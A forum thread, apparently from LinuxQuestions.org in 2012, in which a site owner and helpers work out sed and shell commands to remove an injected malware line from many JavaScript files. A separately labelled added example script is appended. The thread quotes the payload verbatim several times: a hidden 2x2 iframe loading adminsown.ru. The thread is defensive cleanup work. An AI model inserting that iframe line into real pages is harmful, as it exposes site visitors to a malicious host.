LinuxQuestions.org
Old 09-10-2012, 12:10 PM   #1
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Rep: Reputation: Disabled
Question Substitute string in multiple files


Hello,

So - my site has malware that affects hundreds of files... each has the following snippet appended at the end of the file, on a new line and sometimes attached immediately after the end of a statement (;).

I figured out how to list all the files that have a keyword by running:

Code:
 find . | xargs grep "adminsown" -sl > malware.txt
The snippet in question that I want to remove is:
Code:
document.write('<iframe src="http://adminsown.ru/VEREIN?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
But I cannot seem to get it working.

Leaving the malware link so that others may find this thread useful, since it is a very popular malware that has been spreading for a few months and is changing patterns...

How would I replace the malware snippet and keep the original string intact?

Thank you
 
Old 09-10-2012, 12:59 PM   #2
pixellany
LQ Veteran
 
Registered: Nov 2005
Location: Annapolis, MD
Distribution: Arch/XFCE
Posts: 17,802

Rep: Reputation: 738
To remove just that snippet, you need to be sure it is defined correctly. In your discussion, you say you searched on "adminsown". That certainly seems unique, but the question is how to define what else is to be removed---for example:
1. Remove all lines containing "adminsown".
2. Remove all phrases starting with "document", including "adminsown", and ending with "iframe>);"


If the definition is #1, then here is an easy solution:
Code:
sed 's/^.*adminsown.*$//' filename > newfilename
This can be put in a loop that reads the filenames from another file.

To modify the files "in place", use sed -i.
 
1 members found this post helpful.
Old 09-10-2012, 01:31 PM   #3
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled
Hello Pixellany,

Yes - this is certainly helpful and thank you. However there is one little problem - this works as long as the snippet is on a new line and not attached. Some of the JavaScript files contain connected statements, for example:

Code:
var tinyMCEImageList = new Array(["Logo 1", "logo.jpg"],["Logo 2 Over", "logo_over.jpg"]);document.write('<iframe src="http://adminsown.ru/VEREIN?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
This will end up removing more than what is needed; I think what we may need to do is find the substr and replace it only instead of the whole string. The replacement substr could be empty space " " or Newline.
 
Old 09-10-2012, 01:43 PM   #4
pixellany
LQ Veteran
 
Registered: Nov 2005
Location: Annapolis, MD
Distribution: Arch/XFCE
Posts: 17,802

Rep: Reputation: 738
In that example, the sed replacement statement could be:
Code:
sed 's/document.*adminsown.*iframe');//'
Note that the single quote after iframe will need something to keep it from acting as a quote... I don't know that detail off the top of my head.

You can also do:
Code:
sed 's/document.*adminsown.*$//'
This simply goes to the end of the line.
 
1 members found this post helpful.
Old 09-10-2012, 09:04 PM   #5
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled

I figured this would be easier - since the string is always at the end of file and is 141 characters:
Code:
find . | xargs grep 'adminsown' -sl | xargs sed -i 's/.\{141\}$//'
Thanks for your help - I guess I should learn more on SED - very handy!

TAGS:
site infected with malware google browser error warning
Warning: Something's Not Right Here!
 
Old 09-11-2012, 02:31 AM   #6
David the H.
Bash Guru
 
Registered: Jun 2004
Location: Osaka, Japan
Distribution: Debian sid + kde 3.5 & 4.4
Posts: 6,823

Rep: Reputation: 1958
Code:
sed 's/document.*adminsown.*$//'
This seems a bit risky to me, as it relies on a few keywords plus greedy globbing patterns. There is a non-zero risk of hitting false positives. In particular, the common word "document" could appear more than once in the line.

Code:
sed -i 's/.\{141\}$//'
Uh-oh. This will remove the last 141 characters from every line of every file fed to it! At the very least we need to give it a target address of only the last line of the file. Even better would be to put at least a few of the actual string characters in it.

Also, use the -r option to avoid having to backslash the brackets. Set the -i option so that it creates backup files too. You can always run a quick find command to remove them later when you're sure everything went as planned.

Code:
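# '\'' puts a literal single quote into the single-quoted script; \) is a literal parenthesis under -r
sed -i.temp.backup -r '$ s/document\.write.{117}iframe>'\''\);$//'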

Finally, be aware that the above use of xargs will fail on filenames that contain whitespace. See here for how to handle them safely:

How can I find and deal with file names containing newlines, spaces or both?
http://mywiki.wooledge.org/BashFAQ/020


Edit: I'd personally go with a while+read loop instead:

Code:
while IFS='' read -r -d '' fname; do
	if grep -q "adminsown" "$fname"; then
		# '\'' is a literal single quote; \) is a literal parenthesis under -r
		sed -i.temp.backup -r '$ s/document\.write.{117}iframe>'\''\);$//' "$fname"
	fi
done < <( find . -type f -print0 )
Maybe a bit slower, but probably safer and easier to manage.

Edit2:

Thinking a bit more, you should be able to replace the find command with a simple recursive grep, and simplify the loop:

Code:
while IFS='' read -r -d '' fname; do
	# '\'' is a literal single quote; \) is a literal parenthesis under -r
	sed -i.temp.backup -r '$ s/document\.write.{117}iframe>'\''\);$//' "$fname"
	echo "$fname" >> logfile
done < <( grep -R -D skip -I -s -l -Z "adminsown" / )
I also added a line that prints the filenames to a logfile, for later tracking.

Last edited by David the H.; 09-11-2012 at 11:41 AM. Reason: Added last part
 
2 members found this post helpful.
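Added example, not part of any post in this thread: one way to apply the advice above (anchor on the actual string, touch only the last line, keep backups, survive whitespace in file names) without counting characters. It escapes the quoted snippet so sed matches it literally; the function names, the `.infected.bak` suffix and the sample files are made up for illustration, and GNU sed is assumed.

```shell
#!/bin/sh
# Added example, not code from the thread. Requires GNU sed for -i with a suffix.
# The injected string exactly as quoted in the thread (141 characters, one line).
SNIPPET=$(cat <<'EOF'
document.write('<iframe src="http://adminsown.ru/VEREIN?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
EOF
)

# Escape a literal string so sed treats every character as itself (BRE, "/" delimiter).
sed_escape() { printf '%s' "$1" | sed 's#[][\.*^$/]#\\&#g'; }

# clean_tree DIR LITERAL: remove LITERAL only where it ends the last line of a file.
# Keeps FILE.infected.bak beside each changed file and prints the names it changed.
clean_tree() {
    PAT=$(sed_escape "$2"); export PAT
    find "$1" -type f ! -name '*.infected.bak' -exec sh -c '
        for f do
            # Skip files whose last line does not end with the exact string.
            sed -n "\$ { /${PAT}\$/p; }" "$f" | grep -q . || continue
            sed -i.infected.bak "\$ s/${PAT}\$//" "$f" && printf "%s\n" "$f"
        done' sh {} +
}

# Constructed sample tree: snippet glued to code, snippet on its own line, clean file.
make_sample() {
    printf 'var a = ["logo.jpg"];%s' "$SNIPPET" > "$1/attached.js"
    printf 'var b = 1;\n%s\n' "$SNIPPET" > "$1/own line.js"
    printf 'document.title = "admin";\n' > "$1/clean.js"
}

demo=$(mktemp -d) && make_sample "$demo" && clean_tree "$demo" "$SNIPPET"
```

A second run over the same tree changes nothing, because the backups are excluded from the search and the cleaned files no longer end with the string.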
Old 09-11-2012, 08:05 AM   #7
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled
Excellent David. Much appreciated.
 
Old 09-11-2012, 11:43 AM   #8
David the H.
Bash Guru
 
Registered: Jun 2004
Location: Osaka, Japan
Distribution: Debian sid + kde 3.5 & 4.4
Posts: 6,823

Rep: Reputation: 1958
Whoops! Just noticed and fixed an error in the option order in my final grep command.
 
  

